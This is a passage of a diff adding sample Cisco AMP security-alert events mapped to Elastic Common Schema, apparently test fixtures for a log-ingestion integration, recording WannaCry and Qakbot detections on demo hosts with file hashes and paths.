+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094044602Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229327140848000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229327140847656",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T14:41:03.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094046511Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229322845880000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229322845880359",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094048415Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411488666497057000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411488666497056775",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094050302Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411488666497057000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411488666497056774",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094052189Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6411488666497057000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411488666497056773",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "name": "qYf.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe",
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094054051Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411488666497057000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DD6D4FEDD3-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411488666497056775",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "name": "4191700.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe",
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094055941Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411488666497057000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DD6D4FEDD3-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411488666497056774",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:37:40.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c",
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91",
+                    "md5": "6894b3834bd541fa85df79e44568acac"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91",
+                    "6894b3834bd541fa85df79e44568acac",
+                    "8cf0ca99a8f5019d8583133b9a9379299c45470c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:10.094057915Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411488666497057000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DD6D4FEDD3-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411488666497056773",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"
+                }
+            },
+            "@timestamp": "2021-01-14T14:09:00.000Z",
+            "file": {
+                "name": "cmd.exe",
+                "path": "/C:/Windows/SysWOW64/cmd.exe",
+                "hash": {
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 4,
+                "ingested": "2021-09-12T17:32:10.094059796Z",
